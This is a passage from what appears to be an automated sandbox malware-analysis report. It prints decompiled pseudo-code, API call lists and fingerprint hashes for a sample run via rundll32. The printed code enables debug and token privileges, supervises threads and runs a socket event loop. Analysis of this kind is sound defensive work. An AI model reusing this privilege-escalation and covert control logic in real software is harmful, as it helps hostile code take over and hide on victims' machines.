                                                            • HeapFree.KERNEL32(00000000), ref: 0463D7E4
                                                            • LocalAlloc.KERNEL32(00000040,00002800), ref: 0463D806
                                                            • lstrlenW.KERNEL32(?), ref: 0463D882
                                                            • LocalSize.KERNEL32(00000000), ref: 0463D898
                                                            • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 0463D8AC
                                                            • lstrlenW.KERNEL32(?), ref: 0463D8D5
                                                            • lstrlenW.KERNEL32(?), ref: 0463D8FD
                                                            • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 0463D937
                                                            • HeapFree.KERNEL32(00000000), ref: 0463D954
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Alloclstrlen$Heap$AddressFreeProcSize$LibraryLoadProcess
                                                            • String ID: AllocateAndGetTcpExTableFromStack$GetExtendedTcpTable$iphlpapi.dll
                                                            • API String ID: 1916288693-4277049092
                                                            • Opcode ID: 1094672d22b384c443d6a59ad21af2ae1d528ae63bd694e67df73bf8659f0971
                                                            • Instruction ID: aee34478e39811870cae653359e5320498392256df0cc7382cfd8b53612677d2
                                                            • Opcode Fuzzy Hash: 1094672d22b384c443d6a59ad21af2ae1d528ae63bd694e67df73bf8659f0971
                                                            • Instruction Fuzzy Hash: DEC16D71A402199BDB20DF68DC8DBA9B7B4FB58305F040199E90DE7251FB35AE81CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E04649E60(void* __eflags) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				char _v16;
                                                            				void* _v20;
                                                            				char _v24;
                                                            				long _v28;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t19;
                                                            				void* _t22;
                                                            				long _t25;
                                                            				void* _t26;
                                                            				long _t31;
                                                            				int _t41;
                                                            				long _t42;
                                                            				void* _t48;
                                                            				void* _t52;
                                                            				intOrPtr* _t53;
                                                            				void* _t74;
                                                            				void* _t78;
                                                            				void* _t80;
                                                            				void* _t82;
                                                            				signed int _t86;
                                                            				void* _t88;
                                                            
                                                            				_t88 = (_t86 & 0xfffffff8) - 0x14;
                                                            				_push(_t80);
                                                            				_t74 = E0464ADD0(L"SeTcbPrivilege", _t80);
                                                            				_t81 = E0464ADD0(L"SeDebugPrivilege", _t80);
                                                            				_t52 = E0464AC90(L"SeIncreaseQuotaPrivilege", _t74, _t81);
                                                            				_t19 = E0464AC90(L"SeAssignPrimaryTokenPrivilege", _t74, _t81);
                                                            				_t20 = Sleep;
                                                            				if(_t19 == 0) {
                                                            					Sleep(0x1388);
                                                            					_t20 = Sleep;
                                                            				}
                                                            				if(_t52 == 0) {
                                                            					 *_t20(0xbb8);
                                                            				}
                                                            				_t53 = Sleep;
                                                            				if(_t74 == 0) {
                                                            					Sleep(0x1388);
                                                            				}
                                                            				_t95 = _t81;
                                                            				if(_t81 == 0) {
                                                            					Sleep(0x1388);
                                                            				}
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				L04649390(_t53,  &_v16, _t74, _t81, _t95, L"Dispatch");
                                                            				_t75 = CloseHandle;
                                                            				if(_v20 != 0) {
                                                            					L20:
                                                            					_t82 = 0;
                                                            					__eflags = 0;
                                                            					goto L21;
                                                            				} else {
                                                            					_t97 = _v12;
                                                            					_t55 = WaitForSingleObject;
                                                            					if(_v12 == 0) {
                                                            						while(1) {
                                                            							L25:
                                                            							_t25 = E046494D0(_t55, L"Control", _t75, _t81, _t105);
                                                            							_t106 = _t25;
                                                            							if(_t25 == 0) {
                                                            							}
                                                            							L26:
                                                            							_t62 =  &_v28;
                                                            							_v28 = 0;
                                                            							_t77 = E04649620(_t55,  &_v28, _t75, _t81, _t106);
                                                            							if(_t28 == 0) {
                                                            								L24:
                                                            								_t75 = CloseHandle;
                                                            								while(1) {
                                                            									L25:
                                                            									_t25 = E046494D0(_t55, L"Control", _t75, _t81, _t105);
                                                            									_t106 = _t25;
                                                            									if(_t25 == 0) {
                                                            									}
                                                            									goto L26;
                                                            								}
                                                            							}
                                                            							_t70 = _v28;
                                                            							if(_v28 == 0) {
                                                            								goto L24;
                                                            							}
                                                            							_t81 = E04649910(_t77, _t70, _t62);
                                                            							L04655B0F(_t77);
                                                            							_t75 = CloseHandle;
                                                            							_t88 = _t88 + 8;
                                                            							if(_t81 != 0) {
                                                            								_t31 = WaitForSingleObject(_t81, 0xbb8);
                                                            								_t105 = _t31 - 0x102;
                                                            								if(_t31 == 0x102) {
                                                            									CloseHandle(_t81);
                                                            								}
                                                            							}
                                                            							while(1) {
                                                            								L25:
                                                            								_t25 = E046494D0(_t55, L"Control", _t75, _t81, _t105);
                                                            								_t106 = _t25;
                                                            								if(_t25 == 0) {
                                                            								}
                                                            								goto L31;
                                                            							}
                                                            							goto L26;
                                                            							L31:
                                                            							__eflags = _t25 - 0x1fffffff;
                                                            							if(_t25 == 0x1fffffff) {
                                                            								do {
                                                            									_t26 = SetConsoleCtrlHandler(E0464AAF0, 0);
                                                            									__eflags = _t26;
                                                            								} while (_t26 != 0);
                                                            								_t82 = 0x315;
                                                            								L21:
                                                            								_t22 = _v8;
                                                            								__eflags = _t22;
                                                            								if(_t22 != 0) {
                                                            									CloseHandle(_t22);
                                                            								}
                                                            								return _t82;
                                                            							}
                                                            							__eflags = _t25 - 0x2fffffff;
                                                            							if(__eflags != 0) {
                                                            								_t81 = OpenThread(0x1fffff, 0, _t25);
                                                            								__eflags = _t81;
                                                            								if(__eflags == 0) {
                                                            									goto L26;
                                                            								}
                                                            								WaitForSingleObject(_t81, 0xffffffff);
                                                            								CloseHandle(_t81);
                                                            								continue;
                                                            							}
                                                            							Sleep(0x7d0);
                                                            							_t64 =  &_v20;
                                                            							_v20 = 0;
                                                            							_t81 = E04649620(_t55,  &_v20, _t75, _t81, __eflags);
                                                            							__eflags = _t35;
                                                            							if(__eflags == 0) {
                                                            								continue;
                                                            							}
                                                            							_t71 = _v20;
                                                            							__eflags = _v20;
                                                            							if(__eflags == 0) {
                                                            								continue;
                                                            							}
                                                            							_t78 = E04649910(_t81, _t71, _t64);
                                                            							L04655B0F(_t81);
                                                            							_t88 = _t88 + 8;
                                                            							__eflags = _t78;
                                                            							if(__eflags == 0) {
                                                            								goto L24;
                                                            							}
                                                            							__eflags = WaitForSingleObject(_t78, 0xbb8) - 0x102;
                                                            							if(__eflags != 0) {
                                                            								goto L24;
                                                            							}
                                                            							CloseHandle(_t78);
                                                            							E046378B0(_t55, L"Dispatch", 0x2fffffff, CloseHandle, _t81, __eflags);
                                                            							do {
                                                            								_t41 = SetConsoleCtrlHandler(E0464AAF0, 0);
                                                            								__eflags = _t41;
                                                            							} while (_t41 != 0);
                                                            							_t82 = 0x315;
                                                            							goto L21;
                                                            						}
                                                            					}
                                                            					_t42 = E046494D0(WaitForSingleObject, L"Dispatch", CloseHandle, _t81, _t97);
                                                            					if(_t42 == 0) {
                                                            						goto L25;
                                                            					}
                                                            					while(_t42 != 0x2fffffff && _t42 != 0x1fffffff) {
                                                            						_t81 = OpenThread(0x1fffff, 0, _t42);
                                                            						if(_t81 == 0) {
                                                            							goto L25;
                                                            						}
                                                            						WaitForSingleObject(_t81, 0xffffffff);
                                                            						if(GetExitCodeThread(_t81,  &_v28) == 0) {
                                                            							L16:
                                                            							_t48 = L04649390(_t55,  &_v24, _t75, _t81, _t103, L"Dispatch");
                                                            							_t104 = _t48;
                                                            							if(_t48 != 0) {
                                                            								goto L25;
                                                            							}
                                                            							_t42 = E046494D0(_t55, L"Dispatch", _t75, _t81, _t104);
                                                            							_t105 = _t42;
                                                            							if(_t42 != 0) {
                                                            								continue;
                                                            							}
                                                            							goto L25;
                                                            						}
                                                            						_t103 = _v28 - 0x315;
                                                            						if(_v28 == 0x315) {
                                                            							goto L20;
                                                            						}
                                                            						goto L16;
                                                            					}
                                                            					E0464AAD0();
                                                            					goto L20;
                                                            				}
                                                            			}




























                                                            0x04649e66
                                                            0x04649e6f
                                                            0x04649e7b
                                                            0x04649e87
                                                            0x04649e93
                                                            0x04649e95
                                                            0x04649e9c
                                                            0x04649ea1
                                                            0x04649ea8
                                                            0x04649eaa
                                                            0x04649eaa
                                                            0x04649eb1
                                                            0x04649eb8
                                                            0x04649eb8
                                                            0x04649eba
                                                            0x04649ec2
                                                            0x04649ec9
                                                            0x04649ec9
                                                            0x04649ecb
                                                            0x04649ecd
                                                            0x04649ed4
                                                            0x04649ed4
                                                            0x04649edf
                                                            0x04649ee7
                                                            0x04649eef
                                                            0x04649ef9
                                                            0x04649eff
                                                            0x04649f90
                                                            0x04649f90
                                                            0x04649f90
                                                            0x00000000
                                                            0x04649f05
                                                            0x04649f05
                                                            0x04649f0a
                                                            0x04649f10
                                                            0x04649fae
                                                            0x04649fae
                                                            0x04649fb3
                                                            0x04649fb8
                                                            0x04649fba
                                                            0x04649fba
                                                            0x04649fbc
                                                            0x04649fbc
                                                            0x04649fc0
                                                            0x04649fcd
                                                            0x04649fd1
                                                            0x04649fa8
                                                            0x04649fa8
                                                            0x04649fae
                                                            0x04649fae
                                                            0x04649fb3
                                                            0x04649fb8
                                                            0x04649fba
                                                            0x04649fba
                                                            0x00000000
                                                            0x04649fba
                                                            0x04649fae
                                                            0x04649fd3
                                                            0x04649fd9
                                                            0x00000000
                                                            0x00000000
                                                            0x04649fe6
                                                            0x04649fe9
                                                            0x04649fee
                                                            0x04649ff4
                                                            0x04649ff9
                                                            0x0464a001
                                                            0x0464a003
                                                            0x0464a008
                                                            0x0464a00b
                                                            0x0464a00b
                                                            0x0464a008
                                                            0x04649fae
                                                            0x04649fae
                                                            0x04649fb3
                                                            0x04649fb8
                                                            0x04649fba
                                                            0x04649fba
                                                            0x00000000
                                                            0x04649fba
                                                            0x00000000
                                                            0x0464a00f
                                                            0x0464a00f
                                                            0x0464a014
                                                            0x0464a0f0
                                                            0x0464a0f7
                                                            0x0464a0f9
                                                            0x0464a0f9
                                                            0x0464a0fd
                                                            0x04649f92
                                                            0x04649f92
                                                            0x04649f96
                                                            0x04649f98
                                                            0x04649f9b
                                                            0x04649f9b
                                                            0x04649fa5
                                                            0x04649fa5
                                                            0x0464a01a
                                                            0x0464a01f
                                                            0x0464a0cb
                                                            0x0464a0cd
                                                            0x0464a0cf
                                                            0x00000000
                                                            0x00000000
                                                            0x0464a0d8
                                                            0x0464a0db
                                                            0x00000000
                                                            0x0464a0db
                                                            0x0464a02a
                                                            0x0464a030
                                                            0x0464a034
                                                            0x0464a041
                                                            0x0464a043
                                                            0x0464a045
                                                            0x00000000
                                                            0x00000000
                                                            0x0464a04b
                                                            0x0464a04f
                                                            0x0464a051
                                                            0x00000000
                                                            0x00000000
                                                            0x0464a062
                                                            0x0464a065
                                                            0x0464a06a
                                                            0x0464a06d
                                                            0x0464a06f
                                                            0x00000000
                                                            0x00000000
                                                            0x0464a07d
                                                            0x0464a082
                                                            0x00000000
                                                            0x00000000
                                                            0x0464a08f
                                                            0x0464a09b
                                                            0x0464a0a6
                                                            0x0464a0ad
                                                            0x0464a0af
                                                            0x0464a0af
                                                            0x0464a0b3
                                                            0x00000000
                                                            0x0464a0b3
                                                            0x04649fae
                                                            0x04649f1b
                                                            0x04649f22
                                                            0x00000000
                                                            0x00000000
                                                            0x04649f28
                                                            0x04649f44
                                                            0x04649f48
                                                            0x00000000
                                                            0x00000000
                                                            0x04649f4d
                                                            0x04649f5d
                                                            0x04649f69
                                                            0x04649f72
                                                            0x04649f77
                                                            0x04649f79
                                                            0x00000000
                                                            0x00000000
                                                            0x04649f80
                                                            0x04649f85
                                                            0x04649f87
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04649f89
                                                            0x04649f5f
                                                            0x04649f67
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04649f67
                                                            0x04649f8b
                                                            0x00000000
                                                            0x04649f8b

                                                            APIs
                                                              • Part of subcall function 0464ADD0: GetCurrentProcess.KERNEL32(00000008,?), ref: 0464AE13
                                                              • Part of subcall function 0464ADD0: OpenProcessToken.ADVAPI32(00000000), ref: 0464AE1A
                                                              • Part of subcall function 0464ADD0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,00000000), ref: 0464AE2B
                                                              • Part of subcall function 0464ADD0: PrivilegeCheck.ADVAPI32(00000000,00000000,00000000), ref: 0464AE5D
                                                              • Part of subcall function 0464AC90: GetCurrentProcess.KERNEL32(00000028,?,00000000,00000000,?,?,04649E8E), ref: 0464ACAF
                                                              • Part of subcall function 0464AC90: OpenProcessToken.ADVAPI32(00000000,?,?,04649E8E), ref: 0464ACB6
                                                              • Part of subcall function 0464AC90: LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,04649E8E), ref: 0464ACE1
                                                              • Part of subcall function 0464AC90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,04649E8E), ref: 0464ACF6
                                                              • Part of subcall function 0464AC90: GetLastError.KERNEL32(?,?,04649E8E), ref: 0464ACFC
                                                              • Part of subcall function 0464AC90: CloseHandle.KERNEL32(?,?,?,04649E8E), ref: 0464AD0C
                                                            • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04649EC9
                                                            • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04649ED4
                                                            • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 04649F3E
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04649F4D
                                                            • GetExitCodeThread.KERNEL32(00000000,?), ref: 04649F55
                                                            • WaitForSingleObject.KERNEL32(00000000,00000BB8,?,Dispatch,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 0464A001
                                                            • CloseHandle.KERNEL32(00000000,?,Dispatch,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 0464A00B
                                                            • Sleep.KERNEL32(000007D0), ref: 0464A02A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$OpenPrivilegeSleepToken$CloseCurrentHandleLookupObjectSingleThreadValueWait$AdjustCheckCodeErrorExitLastPrivileges
                                                            • String ID: Control$Dispatch$SeAssignPrimaryTokenPrivilege$SeDebugPrivilege$SeIncreaseQuotaPrivilege$SeTcbPrivilege
                                                            • API String ID: 1163877494-1245876370
                                                            • Opcode ID: b5bcc9eb5a761d7a4ee672d2934e42335e7f0ca6103428370a17081afda87595
                                                            • Instruction ID: c3897374ae74f980bc224e286a10ff6b02ccdde07302e6eed03eefc535ce8ddc
                                                            • Opcode Fuzzy Hash: b5bcc9eb5a761d7a4ee672d2934e42335e7f0ca6103428370a17081afda87595
                                                            • Instruction Fuzzy Hash: D65108B16883119BFF64AE749844B2B32999FE0728F150628F911973C0FF64F90986F6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 24%
                                                            			E0464DCA0(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edi, short* _a4, intOrPtr _a8) {
                                                            				signed int _v12;
                                                            				signed int _v16;
                                                            				signed int _v20;
                                                            				LARGE_INTEGER* _v24;
                                                            				signed int _v28;
                                                            				_Unknown_base(*)()* _v32;
                                                            				intOrPtr* _v44;
                                                            				signed int _v56;
                                                            				_Unknown_base(*)()* _v76;
                                                            				void* __esi;
                                                            				short* _t89;
                                                            				signed int _t92;
                                                            				signed int _t94;
                                                            				signed int _t101;
                                                            				signed int _t109;
                                                            				signed int _t112;
                                                            				void* _t118;
                                                            				signed int _t120;
                                                            				signed int _t122;
                                                            				signed int _t127;
                                                            				signed int _t132;
                                                            				signed int _t133;
                                                            				signed int _t136;
                                                            				signed int _t137;
                                                            				signed int _t138;
                                                            				void** _t140;
                                                            				signed int _t141;
                                                            				signed int _t144;
                                                            				signed int _t145;
                                                            				long _t149;
                                                            				intOrPtr _t152;
                                                            				signed int _t156;
                                                            				LARGE_INTEGER* _t159;
                                                            				long _t160;
                                                            				LARGE_INTEGER* _t167;
                                                            				intOrPtr* _t169;
                                                            				LARGE_INTEGER* _t178;
                                                            				_Unknown_base(*)()* _t189;
                                                            				intOrPtr* _t191;
                                                            				intOrPtr* _t197;
                                                            				_Unknown_base(*)()* _t200;
                                                            				intOrPtr* _t203;
                                                            				signed int _t210;
                                                            				signed int _t212;
                                                            				signed int _t216;
                                                            				LARGE_INTEGER* _t217;
                                                            
                                                            				_t210 = _t216;
                                                            				_t189 = 0;
                                                            				_t197 = __ecx;
                                                            				if(_a8 == 0) {
                                                            					_t89 = _a4;
                                                            					__eflags =  *_t89 - 2;
                                                            					_t163 =  !=  ? 0x1c : 0x10;
                                                            					__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t89,  !=  ? 0x1c : 0x10);
                                                            					__eflags = _t89 - 0xffffffff;
                                                            					if(_t89 == 0xffffffff) {
                                                            						goto L14;
                                                            					} else {
                                                            						__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x23);
                                                            						__eflags = _t89 - 0xffffffff;
                                                            						if(_t89 == 0xffffffff) {
                                                            							goto L14;
                                                            						} else {
                                                            							 *(__ecx + 0x4c) = 1;
                                                            							 *(__ecx + 0x50) = 1;
                                                            							SetLastError(0);
                                                            							_t92 =  *((intOrPtr*)( *_t197 + 0x7c))();
                                                            							__eflags = _t92 - 2;
                                                            							if(_t92 != 2) {
                                                            								__imp__#19( *((intOrPtr*)(_t197 + 0x1c)), 0, 0, 0);
                                                            								__eflags = _t92 - 0xffffffff;
                                                            								if(_t92 != 0xffffffff) {
                                                            									goto L13;
                                                            								} else {
                                                            									__imp__#111();
                                                            									__eflags = _t92 - 0x2733;
                                                            									if(_t92 == 0x2733) {
                                                            										goto L13;
                                                            									} else {
                                                            										__eflags = _t92;
                                                            										if(_t92 != 0) {
                                                            											E04637AC0();
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											_t212 = _t216;
                                                            											_t217 = _t216 - 0x18;
                                                            											_t94 =  *0x4684008; // 0xd355be4e
                                                            											_v56 = _t94 ^ _t212;
                                                            											_t191 = _v44;
                                                            											GetCurrentThreadId();
                                                            											 *((intOrPtr*)( *_t191 + 0xbc))(GetCurrentThreadId(), 0, _t197, __ebx, _t210, 0x80004005);
                                                            											__eflags =  *(_t191 + 0x38);
                                                            											_v76 = 1;
                                                            											if( *(_t191 + 0x38) <= 0) {
                                                            												L19:
                                                            												_t200 = 0;
                                                            												__eflags = 0;
                                                            											} else {
                                                            												__eflags =  *(_t191 + 0x3c);
                                                            												if( *(_t191 + 0x3c) <= 0) {
                                                            													goto L19;
                                                            												} else {
                                                            													_t200 = 1;
                                                            												}
                                                            											}
                                                            											_v16 = _t200;
                                                            											_t156 =  *((intOrPtr*)( *_t191 + 0xc4))();
                                                            											_t22 = _t200 + 4; // 0x5
                                                            											_t101 = _t22;
                                                            											_v20 = _t156;
                                                            											_v28 = _t101;
                                                            											__eflags = _t156;
                                                            											if(_t156 != 0) {
                                                            												_t101 = 1 + _t101;
                                                            												__eflags = _t101;
                                                            												_v28 = _t101;
                                                            											}
                                                            											E04671860();
                                                            											_t167 = _t217;
                                                            											_t201 = 0;
                                                            											_v24 = _t167;
                                                            											_t167->LowPart =  *(_t191 + 0x20);
                                                            											_t167->LowPart.HighPart =  *(_t191 + 0x174);
                                                            											 *((intOrPtr*)(_t167 + 8)) =  *((intOrPtr*)(_t191 + 0x178));
                                                            											 *((intOrPtr*)(_t167 + 0xc)) =  *((intOrPtr*)(_t191 + 0x17c));
                                                            											_t107 = 4;
                                                            											__eflags = _v16;
                                                            											if(__eflags == 0) {
                                                            												L25:
                                                            												__eflags = _t156;
                                                            												if(_t156 != 0) {
                                                            													 *(_t167 + _t107 * 4) = _t156;
                                                            												}
                                                            												_v20 =  *((intOrPtr*)(_t191 + 0x2c));
                                                            												_t109 =  *(_t191 + 0x5c);
                                                            												__eflags = _t109;
                                                            												if(_t109 != 0) {
                                                            													L0465ED17(_t109);
                                                            													_t217 =  &(_t217->LowPart.HighPart);
                                                            													 *(_t191 + 0x5c) = 0;
                                                            													 *(_t191 + 0x60) = 0;
                                                            													 *(_t191 + 0x64) = 0;
                                                            												}
                                                            												_t53 = _t191 + 0x5c; // 0x5d
                                                            												E0463ADA0(_t53, _v20, _t167, 0);
                                                            												_t169 = _t191;
                                                            												_t112 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                            												__eflags = _t112;
                                                            												if(_t112 == 0) {
                                                            													L54:
                                                            													_t169 = _t191;
                                                            													 *((intOrPtr*)( *_t191 + 0xc0))(GetCurrentThreadId());
                                                            													__eflags = _v32;
                                                            													if(_v32 != 0) {
                                                            														_t169 = _t191;
                                                            														_t127 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                            														__eflags = _t127;
                                                            														if(_t127 != 0) {
                                                            															_t169 = _t191;
                                                            															 *((intOrPtr*)( *_t191 + 4))();
                                                            														}
                                                            													}
                                                            													GetCurrentThreadId();
                                                            													__eflags = _t201;
                                                            													if(_t201 == 0) {
                                                            														L61:
                                                            														__eflags = _v12 ^ _t212;
                                                            														return E04655AFE(_v12 ^ _t212);
                                                            													} else {
                                                            														_t118 =  *_t201;
                                                            														__eflags = _t118;
                                                            														if(_t118 == 0) {
                                                            															L60:
                                                            															_push(4);
                                                            															E04655B47(_t201);
                                                            															goto L61;
                                                            														} else {
                                                            															_t120 = CloseHandle(_t118);
                                                            															__eflags = _t120;
                                                            															if(_t120 == 0) {
                                                            																goto L64;
                                                            															} else {
                                                            																goto L60;
                                                            															}
                                                            														}
                                                            													}
                                                            												} else {
                                                            													_t159 = _v24;
                                                            													do {
                                                            														__imp__WSAWaitForMultipleEvents(_v28, _t159, 0, 0xffffffff, 0);
                                                            														__eflags = _t112;
                                                            														if(_t112 != 0) {
                                                            															__eflags = _t112 - 1;
                                                            															if(_t112 != 1) {
                                                            																__eflags = _t112 - 2;
                                                            																if(_t112 == 2) {
                                                            																	_v32 = 0;
                                                            																	goto L54;
                                                            																} else {
                                                            																	__eflags = _t112 - 3;
                                                            																	if(_t112 != 3) {
                                                            																		__eflags = _t112 - 4;
                                                            																		if(_t112 != 4) {
                                                            																			__eflags = _t112 - 5;
                                                            																			if(_t112 != 5) {
                                                            																				__eflags = _t112 - 0xffffffff;
                                                            																				if(_t112 != 0xffffffff) {
                                                            																					goto L63;
                                                            																				} else {
                                                            																					__imp__#111();
                                                            																					 *(_t191 + 0xc) = 1;
                                                            																					 *(_t191 + 0x10) = 0;
                                                            																					 *(_t191 + 0x14) = _t112;
                                                            																					 *(_t191 + 0x18) = 1;
                                                            																					goto L54;
                                                            																				}
                                                            																			} else {
                                                            																				goto L47;
                                                            																			}
                                                            																		} else {
                                                            																			__eflags = _v16;
                                                            																			if(_v16 == 0) {
                                                            																				L47:
                                                            																				_t132 =  *((intOrPtr*)( *_t191 + 0xc8))();
                                                            																				__eflags = _t132;
                                                            																				if(_t132 == 0) {
                                                            																					_t133 = GetLastError();
                                                            																					__eflags = _t133;
                                                            																					 *(_t191 + 0xc) = 1;
                                                            																					 *(_t191 + 0x10) = 5;
                                                            																					_t134 =  ==  ? 0x4c7 : _t133;
                                                            																					 *(_t191 + 0x14) =  ==  ? 0x4c7 : _t133;
                                                            																					 *(_t191 + 0x18) = 1;
                                                            																					goto L54;
                                                            																				} else {
                                                            																					goto L48;
                                                            																				}
                                                            																			} else {
                                                            																				L65();
                                                            																				__eflags = _t112;
                                                            																				if(_t112 == 0) {
                                                            																					goto L54;
                                                            																				} else {
                                                            																					goto L48;
                                                            																				}
                                                            																			}
                                                            																		}
                                                            																	} else {
                                                            																		_t136 = L0464E3B0(_t112, _t191);
                                                            																		__eflags = _t136;
                                                            																		if(_t136 == 0) {
                                                            																			goto L54;
                                                            																		} else {
                                                            																			goto L48;
                                                            																		}
                                                            																	}
                                                            																}
                                                            															} else {
                                                            																_t137 = E0464E540(_t191);
                                                            																__eflags = _t137;
                                                            																if(_t137 == 0) {
                                                            																	goto L54;
                                                            																} else {
                                                            																	goto L48;
                                                            																}
                                                            															}
                                                            														} else {
                                                            															_t138 = E0464E140(_t191);
                                                            															__eflags = _t138;
                                                            															if(_t138 == 0) {
                                                            																goto L54;
                                                            															} else {
                                                            																goto L48;
                                                            															}
                                                            														}
                                                            														goto L72;
                                                            														L48:
                                                            														_t169 = _t191;
                                                            														_t112 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                            														__eflags = _t112;
                                                            													} while (_t112 != 0);
                                                            													goto L54;
                                                            												}
                                                            											} else {
                                                            												_t140 = L04655B14(0, __eflags, 4);
                                                            												_t217 =  &(_t217->LowPart.HighPart);
                                                            												_t201 = _t140;
                                                            												 *_t201 = 0;
                                                            												_t141 = CreateWaitableTimerW(0, 0, 0);
                                                            												 *_t201 = _t141;
                                                            												__eflags = _t141;
                                                            												if(_t141 == 0) {
                                                            													_push(0x80004005);
                                                            													E04637AC0();
                                                            													L63:
                                                            													_push(0x80004005);
                                                            													E04637AC0();
                                                            													L64:
                                                            													_push(0x80004005);
                                                            													E04637AC0();
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													_push(_t201);
                                                            													_t203 = _t169;
                                                            													_t122 =  *(_t203 + 0x188);
                                                            													 *(_t203 + 0x188) = 1 +  *(_t203 + 0x188);
                                                            													__eflags = _t122 -  *((intOrPtr*)(_t203 + 0x38));
                                                            													if(_t122 <  *((intOrPtr*)(_t203 + 0x38))) {
                                                            														__imp__#19( *((intOrPtr*)(_t203 + 0x1c)), 0, 0, 0);
                                                            														__eflags = _t122 - 0xffffffff;
                                                            														if(_t122 != 0xffffffff) {
                                                            															L71:
                                                            															return 1;
                                                            														} else {
                                                            															__imp__#111();
                                                            															__eflags = _t122 - 0x2733;
                                                            															if(_t122 == 0x2733) {
                                                            																goto L71;
                                                            															} else {
                                                            																__eflags = _t122;
                                                            																if(_t122 == 0) {
                                                            																	goto L71;
                                                            																} else {
                                                            																	 *(_t203 + 0x14) = _t122;
                                                            																	__eflags = 0;
                                                            																	 *(_t203 + 0xc) = 1;
                                                            																	 *(_t203 + 0x10) = 5;
                                                            																	 *(_t203 + 0x18) = 1;
                                                            																	return 0;
                                                            																}
                                                            															}
                                                            														}
                                                            													} else {
                                                            														 *(_t203 + 0xc) = 1;
                                                            														__eflags = 0;
                                                            														 *(_t203 + 0x10) = 5;
                                                            														 *(_t203 + 0x14) = 0;
                                                            														 *(_t203 + 0x18) = 0;
                                                            														return 0;
                                                            													}
                                                            												} else {
                                                            													_t160 =  *(_t191 + 0x3c);
                                                            													L04671B10();
                                                            													_t178 = _t217;
                                                            													_t144 = _t160;
                                                            													_t145 = _t144 * 0x2710;
                                                            													__eflags = _t145;
                                                            													asm("adc edx, 0x0");
                                                            													_t178->LowPart =  ~_t145;
                                                            													_t178->LowPart.HighPart =  ~(_t144 * 0x2710 >> 0x20);
                                                            													SetWaitableTimer( *_t201, _t178, _t160, 0, 0, 0);
                                                            													_t167 = _v24;
                                                            													_t156 = _v20;
                                                            													 *(_t167 + 0x10) =  *_t201;
                                                            													_t107 = 5;
                                                            													goto L25;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											goto L13;
                                                            										}
                                                            									}
                                                            								}
                                                            							} else {
                                                            								_t149 = GetLastError();
                                                            								__eflags = _t149;
                                                            								_t150 =  ==  ? 0x4c7 : _t149;
                                                            								__imp__#112( ==  ? 0x4c7 : _t149);
                                                            								return 0;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x30);
                                                            					if(__eax == 0xffffffff) {
                                                            						L14:
                                                            						return _t189;
                                                            					} else {
                                                            						_t152 = _a4;
                                                            						_t181 =  !=  ? 0x1c : 0x10;
                                                            						__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t152,  !=  ? 0x1c : 0x10);
                                                            						if(_t152 == 0) {
                                                            							L13:
                                                            							_t189 = 1;
                                                            							goto L14;
                                                            						} else {
                                                            							if(_t152 != 0xffffffff) {
